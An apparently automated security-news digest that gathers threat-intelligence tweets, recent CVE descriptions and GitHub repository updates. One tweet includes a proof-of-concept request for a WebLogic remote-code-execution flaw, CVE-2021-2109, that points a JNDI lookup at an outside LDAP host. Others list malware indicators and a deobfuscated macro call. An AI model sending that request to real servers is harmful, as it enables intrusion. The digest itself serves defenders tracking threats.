virusbtn: CSIS researchers and regular VB conference speaker @benkow_ analysed the affiliate model behind the Nemty ransomware, which ceased operations last spring https://t.co/EusO267VPW https://t.co/8OL0FgNGTk
virusbtn: Security researchers continue to study the SUNBURST malware campaign. @VriesHD has decrypted tens of thousands of subdomains used in the campaign https://t.co/ExLsOCsLi2 https://t.co/Q5DDSa4d1C
MITREattack: Don't forget to join @jamieantisocial & @redcanary today at 1PM ET for a 30-minute live event (and interactive detection challenge!) covering strategies for understanding and detecting adversary WMI-abuse. Sign up at https://t.co/DNorrnSDU4! https://t.co/QwQYCUcoob
SpecterOps: CORRECTION: We are hosting our Red Team Operations (Mar 23-26), Vulnerability Research for Operators (Mar 29-30), and Mac Tradecraft (Mar 31-Apr 1) courses coming up soon. Sign-up links are available here: https://t.co/vgSHK78qaI
TalosSecurity: Talos Takes is back after our winter break! We return with a new episode covering the basics of supply chain attacks and how this isn't the first, nor the last, after #SolarWinds https://t.co/c3tHaU5uQF https://t.co/xFTXHTwtYv
TalosSecurity: We know it's hard to look at any news that's related to Washington at this point, but that doesn't mean the cyber world was quiet this week. Catch up on everything with the Threat Source newsletter https://t.co/MXx8Mf7rTS https://t.co/IewgxUqGRo
TalosSecurity: We are hiring for several positions across different Talos teams. Check out our Careers page (and come back regularly for new postings) to join our groundbreaking organization https://t.co/Z3we6oy6zE https://t.co/3oNSXVfHIV
anyrun_app: TOP10 last week's threats by uploads ⬆️ #Emotet 1547 (954) ⬇️ #NjRAT 282 (320) ⬆️ #FormBook 206 (161) ⬆️ #Remcos 157 (134) ⬆️ #Nanocore 142 (124) ⬆️ #Lokibot 135 (129) ⬆️ #AgentTesla 102 (77) ⬆️ #AsyncRAT 101 (97) ⬆️ #Dridex 97 (39) ⬇️ #Redline 49 (79) https://t.co/98nRpXOxWw
abuse_ch: Did you know what the U.S. 🇺🇸 is hosting most of the active Emotet malware sites world wide and that Google Cloud is responsible for 17% of those? Time to clean up the mess! 🧹🪲 👉 https://t.co/DSARIaelFA https://t.co/ftqnfykGYW
QuoIntelligence: Read about #Malwarebytes #supplychain attack & its significant connection to the #SolarWinds breach. Besides, we've noticed a worldwide increased effort on developing frameworks for supply chain security & resilience. More here: https://t.co/Xbg91ZStOL
JAMESWT_MHT: #VelvetSweatshop Xlsx caught today by @abuse_ch https://t.co/PlK3iJ1roi Spread #Formbook /#Lokibot Urls https://t.co/IDTZ2Z7DDc https://t.co/sOAOvy85Rd Run https://t.co/mOISorT1B6 https://t.co/UXJ02mnDdN cc @malwrhunterteam @verovaleros @lazyactivist192 @Jan0fficial @cocaman https://t.co/0yLlpG2Nt4
cyb3rops: @campuscodi Advice: Don’t accept direct messages from everyone - it turns down the noise and makes them ask you in public to follow them back (which I use for a short background check; number of followers, LinkedIn history and connections etc.) https://t.co/CsiZ2CpKFv
RedDrip7: Seems another sample from #Lazarus Group with invalid sig "2 TOY GUYS LLC".In September 2020,we disclosed a #Lazarus campaign whice used the same C2：www[.]fabioluciani[.]com Our Report: https://t.co/SgubBJK3Mo https://t.co/zuGqAbVJ5I https://t.co/m3kPoQU5mz https://t.co/2zpcRZ6ksh
blackorbird: #Lazarus Campaign Targeting Security Researchers #APT #SocialEngineering "dxgkrnl_poc" Visual Studio Project Analysis Report: 1. https://t.co/0eoRRQQIi5 2. https://t.co/0qomqY69hO Attribution: https://t.co/XMlkH0Vp0r ref: https://t.co/kLizS9Kuo4 https://t.co/uIsE4JKAvp
wugeej: #Oracle WebLogic Server RCE (CVE-2021-2109) [PoC] GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;[Semicolon]👈10:1389/5r5mu7;AdminServer-) https://t.co/S875IxhzFa https://t.co/h2REYhG9Yj
malware_traffic: 2021-01-25 (Monday) - More #TA551 (#shathak) Word docs pushing #Qakbot, so I guess this actor has given up on IcedID. Doc: https://t.co/9UxwNpdM5j DLL: https://t.co/IpV2JosPA5 https://t.co/4kKU2B829g
malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so I couldn't open the attached zip archive. LOL, Ivan! - Message available at: https://t.co/fueJRpOwp0 https://t.co/o6BBA3qcKf
malware_traffic: @secprentice That's why I do it. I have the message chains on email clients on the hosts I infect with Emotet. Emotet then exports that data out to the botnet. That data is used to create fake replies to the stolen Emotet chains. https://t.co/scm3iHZQGI
malware_traffic: 2021-01-22 (Friday) - #TA551 (#shathak) is back for the new year, but now it's pushing #Qakbot (#Qbot) malware instead of IcedID - Paste of info: https://t.co/JxQsmPI8sK - Pastebin raw: https://t.co/nwuRClgacw https://t.co/mALRcnIecE
malware_traffic: 2021-01-22 (Friday) - #Emotet #epoch1 infection with #spambot activity - Still working on sanitizing/carving traffic for the #pcap(s), but I exported 41 emails from unencrypted SMTP traffic and posted them at https://t.co/7CSK1hyqMX - I'll update that blog post if I have time. https://t.co/IucQ9FYw9Z
demonslay335: @GrujaRS Just wow... so it's _basically_ based on HiddenTear with a twist: they encrypt files with AES, then AGAIN with an attempt at what they call a "custom RC4" implementation that uses a larger state matrix. https://t.co/XqwJ2r5mkO
VK_Intel: 2021-01-25:🆕#REvil #Ransomware Debug Version 2.0.3 Jan 11, 2021 "ver":515,"sub":"6545" 1⃣To reach more target files for encryption: SetEveryoneAccess(...)➡️SetEntriesInAcl(...) API 2⃣'FakeGetProcAddress' to get the address of an exported function from DLL h/t @malwrhunterteam https://t.co/OHJhPCdn8i
securitydoggo: Picking everyone's brain: what are your must-have #EDR features? Aside from the obvious, an easy to use querying system across all endpoints would be #1 for me. #cyber #infosec #endpoints
DrunkBinary: @BrianPKime @likethecoins @rickhholland @NicoleBeckwith @Ch33r10 @TheVega @jfslowik @Dragonkin37 @RobertMLee @selenalarson @asfakian Samesies, there will always be next year...and DISC https://t.co/T9FAQxRXWU
ShadowChasing1: Another sample of this compaign which belongs to #Lazarus #APT group ITW:7FC2AF97B004836C5452922D4491BAAA filename:Browse .VC.db C2:angeldonationblog[.]com https://t.co/77efJjnmm3 https://t.co/lBDOdZchq5
ItsReallyNick: @devinmclean @SteveSyfuhs @CISAgov Should you still want to sift for evil based on the lower fidelity UserAuthenticationMethod 16457, we proposed some Solorigate TTP-specific mods: https://t.co/y4KrIOHL00 I understand the Azure AD method flags aren’t in UAL (or MCAS or Sentinel) events after Oct 31, 2020 anyway🤷🏻♂️ https://t.co/NPdpEq8p15
cyberwar_15: #북한 #NorthKorea #Naver #Hanmail #CyberWar 북한 사이버 공작원은 한국 이용자 대상으로 공격시 네이버와 한메일 조건에 따라 각기 다르게 설정해 공격하고 있습니다. 2개의 서버는 다음과 같습니다. 모두 차단하시길 바랍니다. 네이버 : naver.servehttp[.]com 한메일 : attach.ddns[.]net https://t.co/zG5Rr5OBDi
issuemakerslab: In 2016, the South Korean military was occupied by North Korea's cyberattacks. At that time, the head of the cyber center was disciplined for failing to prevent the attack. He sued and won the case for unfairness. https://t.co/iutxgQjVPo
issuemakerslab: North Korea's RGB-D5 is still successful in spear-phishing attacks in the new year. They make up many phishing servers and are attacking various victims in South Korea. https://t.co/zlNeNoHqNB
IntezerLabs: Samples from a recent @Google report about NK campaign targeting security researchers (including 0day vulnerabilities) share code with previous FALLCHILL samples 🇰🇵 https://t.co/31gST672QN https://t.co/Tn84N8VWcH
IntezerLabs: 🐧 Rekoobe [d35657a79c7e0d3ab1fe589f5e8088a1] 🐧 XMRig Miner [befa8b0959809739a6a52bdf9836c8e4] 🐧 Mirai [de1bbb1e4a94de0d047673adaed080c1] 3 Linux threats missed by most security solutions. Get next week's full list of hashes sent to your inbox https://t.co/oTPk2j490C https://t.co/eK13zVfrt1
aboutsecurity: Check out our 1st #SOCWise #LinkedInLive session (15 mins) on supply chain attacks, along with practical advice on how #Blueteam & #AllAroundDefenders can spot the presence of the adversary looking at behaviors across the attack timeline: https://t.co/S5pTXlWrSi #MCFE #McAfee https://t.co/y2UUpKFF5z
kyleehmke: Another set from earlier in January: drive-dwn[.]com (108.62.12[.]186) drive-upd[.]com (108.62.12[.]187) drive1upd[.]com (108.62.12[.]162) drive1update[.]com (108.62.12[.]184) service-boosts[.]com (108.62.12[.]209)...
kyleehmke: backup-updates[.]com (23.106.160[.]205) backup1-online[.]com (23.106.160[.]188) backup1patch[.]com (23.106.160[.]35) servicepatcher[.]com (23.106.160[.]37) topserviceboost[.]com (23.106.160[.]220) topserviceupdate[.]com (23.106.160[.]29) backupupdonline[.]com (4/5)
kyleehmke: best-serviceupd[.]com (194.26.29[.]248) backupupd[.]com (194.26.29[.]247) backupsec[.]com (194.26.29[.]246) backup-boost[.]com (23.106.160[.]233) backup-helps[.]com (23.106.160[.]185) backup-monster[.]com (23.106.160[.]209) backup-updater[.]com (23.106.160[.]234) (3/5)
DissectMalware: With a little hack, #xlmdeobfuscator can now #deobfuscate the latest #zloader docs with ease (not pushed) Spent hours & hours to deobfuscate recent samples manually, find bugs in the emulator, and fix them. Stay tuned 4 xlmdeobfuscator v0.1.7 Video: https://t.co/DeEBdMcTBf https://t.co/swbeoYP0Qa
DissectMalware: @cocaman @ffforward @JAMESWT_MHT @James_inthe_box @lazyactivist192 @GossiTheDog Two layers of XLM macro obfuscation I manually deobfuscated the macro, you can find it here: https://t.co/XMlffT0Tzg Dumps vba: C08AFD90-F2A1-11D1-8455-00A0C91F3880 -> ShellBrowserWindow ShellBrowserWindow.Document.Application.ShellExecute https://t.co/RPpO0wkJuu
Hexacorn: @richinseattle @z0x55g that sys has a time stamp 2020-09-18 22:53:15 (Friday) it's been a while then ? and from cursory check - rc4 key (one of, as there seem to be some in the Registry?)? v24 = 0x8C2DB7B6; v24 = 0xDF145F6B; v24 = 0x73A138B1; v24 = 0xC4D2C189;
JCyberSec_: @peterkruse @ffforward @Office365 @malwrhunterteam @ActorExpose @illegalFawn @phishunt_io @ANeilan @ps66uk @Pawp81 Can you DM me a link to your presentation please. I'd be very interested to take a read. Thanks!
JCyberSec_: @ffforward @peterkruse @Office365 @malwrhunterteam @ActorExpose @illegalFawn @phishunt_io @ANeilan @ps66uk @Pawp81 I'd agree. Ex-Rob uses a : after the authoriseID parameter. The fingerprint isn't the same with this kit.
3xp0rtblog: @Bank_Security I am funny to see when Cyber Intelligence companies are searching for workers with native English and Russian in the kit. It's so ridiculous. About Russian. Russian is versatile, therefore emulating is very hard.
----Vulners.com High Sev. Last 3 Days----
----NVD Last 3 Days----
CVE#: CVE-2020-17532 Published Date: 2021-01-25 CVSS: NO CVSS Description: When handler-router component is enabled in servicecomb-java-chassis, authenticated user may inject some data and cause arbitrary code execution.
The problem happens in versions between 2.0.0 ~ 2.1.3 and fixed in Apache ServiceComb-Java-Chassis 2.1.5
CVE#: CVE-2021-21272 Published Date: 2021-01-25 CVSS: NO CVSS Description: ORAS is open source software which enables a way to push OCI Artifacts to OCI Conformant registries. ORAS is both a CLI for initial testing and a Go Module.
In ORAS from version 0.4.0 and before version 0.9.0, there is a "zip-slip" vulnerability.
The directory support feature allows the downloaded gzipped tarballs to be automatically extracted to the user-specified directory where the tarball can have symbolic links and hard links.
A well-crafted tarball or tarballs allow malicious artifact providers linking, writing, or overwriting specific files on the host filesystem outside of the user-specified directory unexpectedly with the same permissions as the user who runs `oras pull`.
Users of the affected versions are impacted if they are `oras` CLI users who runs `oras pull`, or if they are Go programs, which invoke `github.com/deislabs/oras/pkg/content.FileStore`.
The problem has been fixed in version 0.9.0.
For `oras` CLI users, there is no workarounds other than pulling from a trusted artifact provider.
For `oras` package users, the workaround is to not use `github.com/deislabs/oras/pkg/content.FileStore`, and use other content stores instead, or pull from a trusted artifact provider.
CVE#: CVE-2021-21275 Published Date: 2021-01-25 CVSS: NO CVSS Description: The MediaWiki "Report" extension has a Cross-Site Request Forgery (CSRF) vulnerability. Before fixed version, there was no protection against CSRF checks on Special:Report, so requests to report a revision could be forged.
The problem has been fixed in commit f828dc6 by making use of MediaWiki edit tokens.
CVE#: CVE-2021-23901 Published Date: 2021-01-25 CVSS: NO CVSS Description: An XML external entity (XXE) injection vulnerability was discovered in the Nutch DmozParser and is known to affect Nutch versions < 1.18. XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. This issue is fixed in Apache Nutch 1.18.
InfoSec_Pom: Free Threat Intelligence feed - https://t.co/q1yOWjgK9G https://t.co/qpXvekqf8u The U.S. wants smartphone location… https://t.co/dqN5pELdkW Link with Tweet Link with Tweet Link with Tweet
Sushreesatarupa updated corona_cARe.github.io. This repo has 0 stars and 1 watchers. This repo was created on 2020-11-08. --- TechTogether Boston-WINNER-echoAR Best AR/VR hack-Interactive AR based COVID statistics and information providing web-app with an addictive covid game
dead-hosts updated The-Big-List-of-Hacked-Malware-Web-Sites_git_mitchellkrogza. This repo has 6 stars and 2 watchers. This repo was created on 2018-01-10. --- Test of https://github.com/mitchellkrogza/The-Big-List-of-Hacked-Malware-Web-Sites
carlospolop updated hacktricks. This repo has 1744 stars and 99 watchers. This repo was created on 2020-07-15. --- Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.
avinashkranjan updated Recess. This repo has 0 stars and 1 watchers. This repo was created on 2020-09-05. --- 🚀 MLH- First Day Back Hacks Hackathon... 🤓 Recess - A Social Media Platform for students to share their experience/knowledge they gained in their free time. 🧐
danielebruneo updated remarkable2-hacks. This repo has 8 stars and 2 watchers. This repo was created on 2021-01-25. --- A collection of hacks, mods, tools, tips & tricks, specifically focused on the Remarkable 2
w1th0ut updated red-ocean. This repo has 1 stars and 0 watchers. This repo was created on 2019-05-18. --- This is my first program, for simple hacking activity, made by simple python2 code, hope you enjoy :)
mozilla updated foundation-security-advisories. This repo has 12 stars and 21 watchers. This repo was created on 2014-07-03. --- Canonical source for Mozilla Foundation Security Advisories. http://www.mozilla.org/security/announce/
ZestProjects updated linux. This repo has 0 stars and 0 watchers. This repo was created on 2021-01-26. --- Zest Projects' fork of the Linux kernel. Full LLVM build support is included with patches for features such as Zero Stack Initialisation and Polly, along with improvements to performance and security.
pucherot updated Pi.Alert. This repo has 124 stars and 14 watchers. This repo was created on 2021-01-05. --- WIFI / LAN intruder detector. Check the devices connected and alert you with unknown devices. It also warns of the disconnection of "always connected" devices
arkime updated arkime. This repo has 4586 stars and 362 watchers. This repo was created on 2012-07-06. --- Arkime (formerly Moloch) is an open source, large scale, full packet capturing, indexing, and database system.
Mixeway updated MixewayFrontend. This repo has 4 stars and 3 watchers. This repo was created on 2019-11-29. --- Mixeway is security orchestrator for vulnerability scanners which enable easy plug in integration with CICD pipelines. MixewayFrontend contains source code of GUI created in Angular 8 and based on ngxadmin framework.
Mixeway updated MixewayBackend. This repo has 8 stars and 3 watchers. This repo was created on 2019-11-29. --- Mixeway is security orchestrator for vulnerability scanners which enable easy plug in integration with CICD pipelines. MixewayBackend project contains source code of backend with all plugin integrations writer in Spring Boot.
SHolzhauer updated elastic-tip. This repo has 11 stars and 3 watchers. This repo was created on 2020-10-10. --- Elastic TIP is a python tool which automates the process of aggregating Threat Intelligence and ingesting the intelligence into a common format into Elasticsearch with the main goal of being used by the Security solution.
vituperative updated i2pplus. This repo has 1 stars and 1 watchers. This repo was created on 2020-06-12. --- I2P+ is a soft-fork of the Java I2P Anonymizing Network Layer - this is a mirror of https://gitlab.com/i2pplus/I2P.Plus/
OpenZeppelin updated openzeppelin-contracts. This repo has 9049 stars and 470 watchers. This repo was created on 2016-08-01. --- OpenZeppelin Contracts is a library for secure smart contract development.
github updated codeql. This repo has 1947 stars and 81 watchers. This repo was created on 2018-07-31. --- CodeQL: the libraries and queries that power security researchers around the world, as well as code scanning in GitHub Advanced Security (code scanning), LGTM.com, and LGTM Enterprise
Skyscanner updated cfripper. This repo has 258 stars and 10 watchers. This repo was created on 2018-07-02. --- Library and CLI tool for analysing CloudFormation templates and check them for security compliance.
codesandtags updated poc-blog. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-25. --- This is a Proof of Concept, about how to create microservices using NodeJS, Express and React. This project contains a monorepo which represents the microservices to manage a blog website.
swiss-territorial-data-lab updated regbl-poc-analysis. This repo has 0 stars and 0 watchers. This repo was created on 2021-01-21. --- Analysis script and tools for the proof of concept for the Registry of building (RegBL) completion
Ch-sriram updated node-js-deno. This repo has 0 stars and 1 watchers. This repo was created on 2020-11-19. --- Proof of Concept: NodeJS & Deno. Repository contains concepts and code related to Node JS [Vanilla Node, Express Framework, REST APIs, GraphQL, Websockets & more] & Deno.
swissarmysam updated signal-nui. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-10. --- A proof-of-concept natural user interface (NUI) using hand gestures and voice to control a video streaming website.
joshuajung updated 116117bot. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-26. --- A proof of concept bot, checking impfterminservice.de for available COVID-19 vaccination appointments.
contriteobserver updated RajawaliAssimpBridge. This repo has 0 stars and 1 watchers. This repo was created on 2020-11-19. --- A proof of concept integration between Rajawali and the Open Asset (Assimp) Import Library
EticaAI updated HXL-Data-Science-file-formats. This repo has 2 stars and 2 watchers. This repo was created on 2021-01-24. --- [public draft][Proof of concept] Common file formats used for Data Science exported from HXL (The Humanitarian Exchange Language)
jzohdi updated image-upload-poc. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-10. --- This is a proof of concept project where a user will be able to create an image gallery accepting real time image uploads.